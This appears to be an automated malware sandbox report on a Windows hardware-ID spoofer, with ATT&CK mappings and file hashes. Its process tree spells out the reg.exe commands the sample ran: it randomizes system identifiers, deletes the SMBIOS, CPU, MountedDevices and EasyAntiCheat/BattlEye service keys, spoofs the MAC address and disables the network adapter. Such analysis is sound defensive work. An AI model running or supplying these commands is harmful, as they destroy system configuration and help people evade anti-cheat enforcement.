- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1132
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1740
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:488
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3416
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3160
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3916
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2312
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:2736
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {286243281-2950429714-2046229010} /f
    3⤵
    - Modifies registry key
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3540
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {286243281-2950429714-2046229010} /f
    3⤵
    - Modifies registry key
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:2428
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:3736
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:4608
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:3448
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:5100
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:1540
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:4000
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:2852
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:3436
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    - Modifies registry key
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:3284
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:448
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:1216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:3892
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:1956
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:4688
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:4644
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:4840
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d E62C23451539 /f
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:4064
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:4948
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:3996
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:700
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:4984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:4932
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    PID:3524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
- Modifies data under HKEY_USERS
PID:1676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\GameBarPresenceWriter\Mac.bat

Filesize
1KB

MD5
707c798832f76eb383a0501b2773ec32

SHA1
3ebd0413af9929109ea0eb0045a2d26a256e771f

SHA256
940f3e68e62ad73c0668e854d821d88eacc8ea8fb8e130e42a34368ae9f5852e

SHA512
13e92ef958cfcc5686a2886b4a011f2287ec261028db0c6816d738eb715490d69ca37f8232e7bb3bebd5d49ce65bf4b9f55ae12d4af056bf569e5a1dba2f3da9

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads